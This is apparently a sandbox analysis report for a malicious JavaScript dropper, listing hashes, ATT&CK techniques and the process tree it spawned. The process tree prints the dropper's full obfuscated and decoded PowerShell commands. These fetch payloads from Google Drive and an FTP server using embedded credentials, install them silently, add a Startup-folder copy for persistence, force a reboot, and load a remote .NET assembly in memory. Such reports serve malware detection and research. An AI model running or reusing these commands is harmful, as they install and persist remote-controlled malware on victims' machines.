21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3

General

Target

21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js
Size

120KB
MD5

c654511bc71143604fa59947da8225bf
SHA1

11cb2a2983a22a64b7a822a9b0c484dc1dd5d1e9
SHA256

21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3
SHA512

a646b7e6b4f16390a61399531ca0b5611602020c98084f8e65ca93e1c335bb1416a7054456217287a33f31d8e54ad8e66125ca7e8ddb87daf7de0f065ae79693
SSDEEP

1536:5dgBlOFpdq7MkzYWELraVId79UuxMoMxMUOIVSq41M2twpJS7fZ134Sm:+YFp0wq

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2868	powershell.exe
2820	powershell.exe
2612	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2868	powershell.exe
2820	powershell.exe
2812	powershell.exe
2612	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2704 wrote to memory of 2868	2704	wscript.exe	31
PID 2704 wrote to memory of 2868	2704	wscript.exe	31
PID 2704 wrote to memory of 2868	2704	wscript.exe	31
PID 2868 wrote to memory of 2820	2868	powershell.exe	33
PID 2868 wrote to memory of 2820	2868	powershell.exe	33
PID 2868 wrote to memory of 2820	2868	powershell.exe	33
PID 2820 wrote to memory of 2812	2820	powershell.exe	34
PID 2820 wrote to memory of 2812	2820	powershell.exe	34
PID 2820 wrote to memory of 2812	2820	powershell.exe	34
PID 2812 wrote to memory of 3044	2812	powershell.exe	35
PID 2812 wrote to memory of 3044	2812	powershell.exe	35
PID 2812 wrote to memory of 3044	2812	powershell.exe	35
PID 2820 wrote to memory of 2612	2820	powershell.exe	36
PID 2820 wrote to memory of 2612	2820	powershell.exe	36
PID 2820 wrote to memory of 2612	2820	powershell.exe	36

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + 'RAEQAcg' + [char]66 + 'mAFYAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAUQ' + [char]66 + 'EAHIAZg' + [char]66 + 'WACAAKQAgAHsAJA' + [char]66 + 'UAFoAVw' + [char]66 + 'vAHUAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAFQAWg' + [char]66 + 'XAG8AdQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAcQ' + [char]66 + 'WAGcAVw' + [char]66 + 'EACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAcQ' + [char]66 + 'WAGcAVw' + [char]66 + 'EACAAKQAgAHsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsAIAA9ACAAKAAkAGQAaA' + [char]66 + '5AGwAawAgACsAIAAnADEATg' + [char]66 + 'hAHEAZA' + [char]66 + 'OAFgAaQ' + [char]66 + 'HAHYASQ' + [char]66 + 'fAHEAMQ' + [char]66 + 'SAFAAaw' + [char]66 + 'hAHoARg' + [char]66 + '0AE0AeQ' + [char]66 + 'nAG0AYQ' + [char]66 + 'xAFQASg' + [char]66 + 'YAHUANAAyACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGQAaA' + [char]66 + '5AGwAawAgAD0AIAAoACQAZA' + [char]66 + 'oAHkAbA' + [char]66 + 'rACAAKwAgACcAMQ' + [char]66 + 'nADEAag' + [char]66 + 'tAFgAdQ' + [char]66 + 'zAFgAOQ' + [char]66 + 'tAGMAOQ' + [char]66 + 'WAG0AaA' + [char]66 + 'WAHIASg' + [char]66 + 'KADIAWA' + [char]66 + 'vAGYAWgAzAGEASw' + [char]66 + 'fAGMATA' + [char]66 + 'PAHQAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAVQ' + [char]66 + 'SAEwASw' + [char]66 + 'CACwAIAAkAFQAWg' + [char]66 + 'XAG8AdQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApACAAOwAkAG0AYw' + [char]66 + 'ZAEQAZgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + '0AGsAcA' + [char]66 + 'sAEIAIAA9ACAAKAAgACQAVA' + [char]66 + 'aAFcAbw' + [char]66 + '1ACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '0AGsAcA' + [char]66 + 'sAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAbQ' + [char]66 + 'jAFkARA' + [char]66 + 'mACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAHIAdg' + [char]66 + 'pAGMAZQ' + [char]66 + 'QAG8AaQ' + [char]66 + 'uAHQATQ' + [char]66 + 'hAG4AYQ' + [char]66 + 'nAGUAcg' + [char]66 + 'dADoAOg' + [char]66 + 'TAGUAYw' + [char]66 + '1AHIAaQ' + [char]66 + '0AHkAUA' + [char]66 + 'yAG8AdA' + [char]66 + 'vAGMAbw' + [char]66 + 'sACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAVA' + [char]66 + '5AHAAZQ' + [char]66 + 'dADoAOg' + [char]66 + 'UAGwAcwAxADIAOwAkAHIAZg' + [char]66 + '4AHMAdgAgAD0AIAAoAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACkAOwAkAHIAZg' + [char]66 + '4AHMAdgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ADsAJA' + [char]66 + 'yAGYAeA' + [char]66 + 'zAHYALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACcAZA' + [char]66 + 'lAHYAZQ' + [char]66 + 'sAG8AcA' + [char]66 + 'lAHIAcA' + [char]66 + 'yAG8AMgAxADUANwA4AEoAcA' + [char]66 + 'AAEAAJwApADsAJA' + [char]66 + 'jAGsAUQ' + [char]66 + 'QAFcAIAA9ACAAJA' + [char]66 + 'yAGYAeA' + [char]66 + 'zAHYALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKAAgACcAZg' + [char]66 + '0AHAAOgAvAC8AZA' + [char]66 + 'lAHMAYw' + [char]66 + 'rAHYAYg' + [char]66 + 'yAGEAdAAxAEAAZg' + [char]66 + '0AHAALg' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0AC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + 'VAHAAYw' + [char]66 + 'yAHkAcA' + [char]66 + '0AGUAcgAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'yAGYAeA' + [char]66 + 'zAHYALg' + [char]66 + 'kAGkAcw' + [char]66 + 'wAG8Acw' + [char]66 + 'lACgAKQA7ACQAcg' + [char]66 + 'mAHgAcw' + [char]66 + '2ACAAPQAgACgATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAKQA7ACQAcg' + [char]66 + 'mAHgAcw' + [char]66 + '2AC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'UAGUAeA' + [char]66 + '0AC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nAF0AOgA6AFUAVA' + [char]66 + 'GADgAOwAkAGMAaw' + [char]66 + 'RAFAAVwAgAD0AIAAkAHIAZg' + [char]66 + '4AHMAdgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'jAGsAUQ' + [char]66 + 'QAFcAIAApADsAWw' + [char]66 + 'CAHkAdA' + [char]66 + 'lAFsAXQ' + [char]66 + 'dACAAJA' + [char]66 + 'kAEMAaQ' + [char]66 + 'XAHoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEMAbw' + [char]66 + 'uAHYAZQ' + [char]66 + 'yAHQAXQA6ADoARg' + [char]66 + 'yAG8AbQ' + [char]66 + 'CAGEAcw' + [char]66 + 'lADYANA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'jAGsAUQ' + [char]66 + 'QAFcALg' + [char]66 + 'SAGUAcA' + [char]66 + 'sAGEAYw' + [char]66 + 'lACgAIAAnAJMhOgCTIScAIAAsACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAApACAAKQA7AFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAG8AbQ' + [char]66 + 'hAGkAbg' + [char]66 + 'dADoAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'kAEMAaQ' + [char]66 + 'XAHoAIAApAC4ARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAgACkALg' + [char]66 + 'HAGUAdA' + [char]66 + 'NAGUAdA' + [char]66 + 'oAG8AZAAoACAAJw' + [char]66 + 'wAHIARg' + [char]66 + 'WAEkAJwAgACkALg' + [char]66 + 'JAG4Adg' + [char]66 + 'vAGsAZQAoACQAbg' + [char]66 + '1AGwAbAAsACAAWw' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdA' + [char]66 + 'bAF0AXQAgACgAIAAnAHQAeA' + [char]66 + '0AC4Acw' + [char]66 + '2AHIAZQ' + [char]66 + 'zAC8AeA' + [char]66 + 'pAGYALw' + [char]66 + 'zAG4AaQ' + [char]66 + 'nAHUAbA' + [char]66 + 'wAC8AdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AYwAtAHAAdwAvAGwAYwAuAHMAbw' + [char]66 + 'uAGkAYw' + [char]66 + 'uAGUAcw' + [char]66 + 'vAGwAZQ' + [char]66 + '1AHEAcg' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAAsACAAJwAlAEQAQw' + [char]66 + 'QAEoAVQAlACcALAAgACcAdA' + [char]66 + 'yAHUAZQAxACcAIAApACAAKQA7AH0AOwA=';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js') ;powershell $jPhaA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$QDrfV = $host.Version.Major.Equals(2);If ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ($TZWou + '\Upwin.msu');$dhylk = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $qVgWD ) {$dhylk = ($dhylk + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$dhylk = ($dhylk + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$dhylk = ( New-Object Net.WebClient ) ;$dhylk.Encoding = [System.Text.Encoding]::UTF8 ;$dhylk.DownloadFile($URLKB, $TZWou + '\Upwin.msu') ;$mcYDf = ( 'C:\Users\' + [Environment]::UserName );tkplB = ( $TZWou + '\Upwin.msu' ) ; powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$rfxsv = (New-Object Net.WebClient);$rfxsv.Encoding = [System.Text.Encoding]::UTF8;$rfxsv.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$ckQPW = $rfxsv.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$rfxsv.dispose();$rfxsv = (New-Object Net.WebClient);$rfxsv.Encoding = [System.Text.Encoding]::UTF8;$ckQPW = $rfxsv.DownloadString( $ckQPW );[Byte[]] $dCiWz = [System.Convert]::FromBase64String( $ckQPW.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $dCiWz ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'txt.svres/xif/snigulp/tnetnoc-pw/lc.sonicnesoleuqrap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js', 'true1' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2812
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:3044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QFFBXDS01EIF26T62ISN.temp

Filesize
7KB

MD5
feb2ce82483b9b46a4b083e5d073f338

SHA1
5f8c25793a1bff0371f928bcfab13b2cf408ae6c

SHA256
2ec1372d0577f668bf33900d21c4cfa44c76edad6480828881d93b4c1f5f2467

SHA512
9289d70042fb998a1c57e45998c0d790a31fe9885a743c400d1b8bbc28570483c1fdb769d845dc8ca71d5d3c02b9caddc13cab0f1fdc2d710a05965cd45ee6b9

Download Submit
memory/2868-4-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

Filesize
4KB

Download
memory/2868-7-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2868-6-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2868-5-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2868-8-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2868-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2868-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2868-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2868-29-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2868-30-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing